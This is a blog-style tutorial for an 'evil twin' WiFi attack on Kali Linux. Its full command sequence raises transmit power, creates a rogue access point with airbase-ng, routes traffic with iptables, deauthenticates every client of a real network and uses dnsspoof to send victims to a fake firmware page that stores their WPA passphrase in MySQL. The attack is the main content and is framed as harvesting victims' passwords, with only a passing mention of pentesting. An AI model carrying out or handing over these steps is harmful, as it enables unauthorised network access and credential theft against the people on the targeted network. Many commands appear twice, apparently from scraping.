Installing required tools
So far we have aircrack-ng suite of tools, apache, mysql, iptables pre-installed in our Kali Linux virtual machine.
We just need to install isc-dhcp-server for IP address allocation to the client.
Install isc-dhcp-server in Kali Linux
Type in terminal:
apt-get update
apt-get install isc-dhcp-server -y
apt-get update
apt-get install isc-dhcp-server -y
This will update the cache and install latest version of dhcp server in your Kali Linux box.
install-dhcp-server-kali-linux-2-sana
Now all the required tools are installed. We need to configure apache and the dhcp server so that the access point will allocate IP address to the client/victim and client would be able to access our webpage remotely.
Enable “public_html” remote access in apache2
By default apache doesn’t allow public access to remote connections. So we need to do some more work.
In Ubuntu and other debian based distros, apache’s default web directory is /var/www/public_html/. In case there is no such directory, create one.
Open terminal and type:
mkdir /var/www/public_html
mkdir /var/www/public_html
Remember, In Kali Linux default apache web directory is /var/www/html. So put all the rogue_AP.zip content under/var/www/html.
Now you’ll need to enable remote access to the public_html directory
Type in terminal:
gedit /etc/apache2/mods-available/userdir.conf
gedit /etc/apache2/mods-available/userdir.conf
and edit the outlined portion and make sure your file looks like the below image:
enable-remote-public-html-access-apache
Enable the new userdir configuration file
a2enmod userdir
1
a2enmod userdir
Now we will define the IP range and the subnet mask for the dhcp server.
Configure isc-dhcp-server
Type in terminal:
gedit /etc/dhcp/dhcpd.conf
gedit /etc/dhcp/dhcpd.conf
and type this in the beginning of the file
authoritative;
default-lease-time 600;
max-lease-time 7200;
subnet 192.168.1.0 netmask 255.255.255.0
{
option subnet-mask 255.255.255.0;
option broadcast-address 192.168.1.255;
option routers 192.168.1.1;
option domain-name-servers 8.8.8.8;
range 192.168.1.1 192.168.1.100;
}
1
2
3
4
5
6
7
8
9
10
11
authoritative;
default-lease-time 600;
max-lease-time 7200;
subnet 192.168.1.0 netmask 255.255.255.0
{
option subnet-mask 255.255.255.0;
option broadcast-address 192.168.1.255;
option routers 192.168.1.1;
option domain-name-servers 8.8.8.8;
range 192.168.1.1 192.168.1.100;
}
Your dhcpd.conf file will look like this
configure-isc-dhcp-server-dhcpd.conf
(Optional)Resolve airmon-ng and Network Manager Conflict
Before enabling monitor mode on the wireless card let’s fix the airmon-ng and network-manager conflict forever.
So that we don’t need to kill the network-manager or disconnect tany network connection before putting wireless adapter into monitor mode as we used to run airmon-ng check kill every time we need to start wifi pentest.
Open terminal and type:
gedit /etc/NetworkManager/NetworkManager.conf
gedit /etc/NetworkManager/NetworkManager.conf
Now add the following at the end of the file
[keyfile]
unmanaged-devices=interface-name:wlan0mon;interface-name:wlan1mon;interface-name:wlan2mon;interface-name:wlan3mon;interface-name:wlan4mon;interface-name:wlan5mon;interface-name:wlan6mon;interface-name:wlan7mon;interface-name:wlan8mon;interface-name:wlan9mon;interface-name:wlan10mon;interface-name:wlan11mon;interface-name:wlan12mon
[keyfile]
unmanaged-devices=interface-name:wlan0mon;interface-name:wlan1mon;interface-name:wlan2mon;interface-name:wlan3mon;interface-name:wlan4mon;interface-name:wlan5mon;interface-name:wlan6mon;interface-name:wlan7mon;interface-name:wlan8mon;interface-name:wlan9mon;interface-name:wlan10mon;interface-name:wlan11mon;interface-name:wlan12mon
Output should look like this
Edit NewtorkManager.conf to prevent conflicts with airmon-ng (no check kill)
Now that you have edited the NetworkManager.conf file you should have no conflicts with airmon-ng in Kali Linux 2.0
We are ready to begin now.
Bring up the wireless interface
ifconfig wlan1 up #Your could be wlan0, wlan2 etc
ifconfig wlan1 up #Your could be wlan0, wlan2 etc
Put wireless adapter into monitor mode
airmon-ng start wlan1
airmon-ng start wlan1
Putting the card in monitor mode will show a similar output
airmon-ng-start-wlan1-no-error
Now our card is in monitor mode without any issues with network manager. You can simply start monitoring the air with command
airodump-ng wlan1mon
airodump-ng wlan1mon
airodump-ng-scan-target-output
As soon your target AP appears in the airodump-ng output window press CTRL-C and note these three things in a text editor(Gedit, in case)
save-access-point-info
Set tx-power of alfa card to max: 1000mW
tx-power stands for transmission power. By default it is set to 20dBm(Decibel metre) or 100mW.
tx-power in mW increases 10 times with every 10 dBm. See the dBm to mW table.
If your country is set to US while installation. most probably your card should operate on 30 dBm(1000 mW)
In Kali Linux 2.0 (Codename: Sana) You might face issue while powering up your card.
As in earlier versions if you set country(region) to Bolivia, you are able to operate card at 30 dBm. But in Kali Sana is not working. So we’ll be using US as our region. Here is how
ifconfig wlan1mon down #Bring down the interface
iw reg set US #Set region to be US
ifconfig wlan1mon up #Bring the interface up
iwconfig wlan1mon # Check tx-power, should be 30 dBm
ifconfig wlan1mon down #Bring down the interface
iw reg set US #Set region to be US
ifconfig wlan1mon up #Bring the interface up
iwconfig wlan1mon # Check tx-power, should be 30 dBm
If you are thinking why we need to change region to operate our card at 1000mW. Here is why
because different countries have different legal allowance of Wireless devices at certain power and frequency. That is why Linux distribution have this information built in and you need to change your region to allow yourself to operate at that frequency and power.
Motive of powering up the card is that when creating the hotspot you do not have any need to be near to the victim. victim device will automatically connect to the device with higher signal strength even if it isn’t physically near.
Start Fake WiFi Access Point
Now we will create the fake WiFi access point using airbase-ng:
airbase-ng -e "rootsh3ll" -c 1 wlan1mon
airbase-ng -e "rootsh3ll" -c 1 wlan1mon
fake wifi access point using airbase-ng
by default airbase-ng creates a tap interface(at0) as the wired interface for bridging/routing the network traffic via the rogue access point. you can see it using ifconfig at0 command.
ifconfig at0
For the at0 to allocate IP address we need to assign an IP range to itself first.
Allocate IP and Subnet Mask
allocate ip range to at0 tap interface
Here we have allocated Class-C IP address to the at0 interface.
route command had set 192.168.1.0 as the network address, 255.255.255.0 as Subnet Mask and 192.168.1.1 as default gateway i.e at0’s IP
Do not confuse between Network address and default gateway. Network address is also called the network node. Nodes are the reserved IP address of any specific range. “X.X.X.0” and “X.X.X.255” are always reserved that is why IP range always varies from X.X.X.1-254
An address that ends in “.255” is also called broadcast address: all devices in the same network should handle packets addressed to the broadcast address.
Now as we have allocated IP address and subnet mask to the at0 interface we will use our default ethernet interface i.e eth0, through which we access the network connection or the Internet inside the virtual machine to route all the traffic from the client through it.
In short allowing victim to access the internet and allowing ourselves(attacker) to sniff the victim traffic.
For that we will use IPtables utility to set a firewall rule to route all the traffic through this specific interface.
first you need to check the IP address of the routing interface. check it using
ip route
ip route
you will get a similar output, if using VM
ip route command
Note the first line, it says “default“. It means the interface defined: eth0, is the upstream(Internet enabled) interface on this machine and 192.168.2.129 is the IP of the same as written in second line.
NOTE: second line also says eth0. Your’s may be different
Enable NAT by setting Firewall rules in Iptables
Enter the following commands to set-up an actual NAT:
iptables --table nat --append POSTROUTING --out-interface eth0 -j MASQUERADE
iptables --append FORWARD --in-interface at0 -j ACCEPT
iptables --table nat --append POSTROUTING --out-interface eth0 -j MASQUERADE
iptables --append FORWARD --in-interface at0 -j ACCEPT
Make sure you enter correct interface for –out-interface. eth0 here is the upstream interface where we want to send out packets, coming from at0 interface(from victim). Rest if fine.
Don’t worry we will discuss the meaning of the above commands in the coming chapter in detail. Till then just test it ??
After entering the above command if you are willing to provide Internet access to the victim just enable routing using the command below
Enable forwarding
echo 1 > /proc/sys/net/ipv4/ip_forward
echo 1 > /proc/sys/net/ipv4/ip_forward
Entering “1” in the ip_forward file will tell the system to enable the rules defined in the IPtables and start forwarding traffic(if any). 0 stand for disable. Although rules will remain defined until next reboot.
We will put it 0 for this attack, as we are not providing internet access before we get the WPA password.
Fake wifi access point is now up and rules has been enabled, now we will start the dhcp server to allow fake AP to allocate IP address to the clients.
First we need to tell dhcp server the location of the file we created earlier, which defines IP class, subnet mask and range of the network.
Start dhcpd Listener
Type this in terminal:
dhcpd -cf /etc/dhcp/dhcpd.conf -pf /var/run/dhclient-eth0.pid at0
dhcpd -cf /etc/dhcp/dhcpd.conf -pf /var/run/dhclient-eth0.pid at0
Here -cf stands for Configuration file and -pf stands for PID file
Use your desired name for .pid file.
You should see a similar output
tell configuration file to dhcpd
In case you are facing any issue regarding dhcp server, just kill the curently running dhcp process
killall dhcpd isc-dhcp-server
killall dhcpd isc-dhcp-server
and run dhcpd again. It should work now.
Start the Services
Now start the dhcp server, apache and mysql inline
service isc-dhcp-server start
/etc/init.d/apache2 start
/etc/init.d/mysql start
service isc-dhcp-server start
/etc/init.d/apache2 start
/etc/init.d/mysql start
We have our fake wifi access point up and working perfectly. Now we need to setup our fake webpage in action so that victim will see the webpage while browsing and enter the passphrase which s/he uses for his/her access point.
Download the rogue_AP.zip file here and extract it on your desktop
and simply enter the following command in Terminal
unzip rogue_AP.zip -d /var/www/public_html/
unzip rogue_AP.zip -d /var/www/public_html/
This command will extract the contents of rogue_AP.zip file and copy them to the apache’s public_html directory so that when the victim opens the browser s/he will automatically be redirected to the default index.html webpage.
Now to store the credentials entered by the victim in the html page, we need an SQL database.
you will see a dbconnect.php file for that, but to be in effect you need a database created already so that the dbconnect.php will reflect the changes in the DB.
Open terminal and type:
mysql -u root
mysql -u root
now create database and table as defined in the dbconnect.php. Simply type
mysql> create database rogue_AP;
mysql> use rogue_AP;
mysql> create table wpa_keys(password1 varchar(64), password2 varchar(64));
mysql> create database rogue_AP;
mysql> use rogue_AP;
mysql> create table wpa_keys(password1 varchar(64), password2 varchar(64));
it should go like this:
create-mysql-database and table for credential harvest
now you may test inserting a test value in the table
Type:
mysql> insert into wpa_keys(password1, password2) values ("testpass", "testpass");
mysql> select * from wpa_keys;
mysql> insert into wpa_keys(password1, password2) values ("testpass", "testpass");
mysql> select * from wpa_keys;
insert values in table
Note that both the values are same here, that means password and confirmation password should be the same.
Our attack is now ready just wait for the client to connect and see the credential coming.
In some cases your client might already be connected to the original AP. You need to disconnect the client as we did in the previous chapters using aireplay-ng utility.
open the notepad in which you saved the AP info and type:
aireplay-ng –deauth 0 -a <BSSID> wlan1mon
aireplay-ng --deauth 0 -a FC:DD:55:08:4F:C2 wlan1mon
aireplay-ng --deauth 0 -a FC:DD:55:08:4F:C2 wlan1mon
–deauth 0 : Unlimited de-authentication requests. Limit the request by entering natural numbers.
We are using 0 so that every client will disconnect from that specific BSSID and connect to our AP as it is of the same name as of real AP and also open type access point.
aireplay-ng deauthenticate the client
As soon a client connects to your AP you will see an activity in the airbase-ng terminal window like this
client connects to airbase-ng fake access point
Now to simulate the client side I am using Ubuntu machine connected via WiFi and using a Firefox web browser to illustrate the attack.
Victim can now access Internet now. You can do 2 Sniff the client traffic
Redirect all the traffic to the fake AP page
and that’s what we wanna do. Redirect the client to our fake AP page.
Just run this command:
dnsspoof -i at0
dnsspoof -i at0
It will redirect all client traffic coming from the at0 interface.
When victim tries to access any website(google.com in this case), s/he will see this page which tell the victim to enter the password to download and upgrade the firmware
evil twin web administrator login page
Here i am entering “iamrootsh3ll” as the password that I (Victim) think is his/her AP’s password.
Subscribe and Download the Rogue_AP.zip:
Now coming back to attacker side. You need to check in the mySQL database for the stored passwords.
Just type the previously used command in the mySQL terminal window and see whether a new update is there or not.
After simulating I checked the mySQL DB and here is the output
check harvested wpa password
Voila! you have successfully harvested the WPA passphrase right from the victim in plain text.
now close all the terminal windows and connect back to the real AP to check whether the password is correct or victim was him/herself was a hacker and tricked you. haha
Although you don’t need to name any AP similar to an existing AP you can also create a random free open WiFi type name to gather the client on your AP and start pentesting.
That’s a free machines for you for penetration testing.
There are hell lot of possibilities of attacks and techniques using fake wifi access point that we will surely discuss in upcoming posts. till then keep testing and
Keep Learning.
No comments:
Post a Comment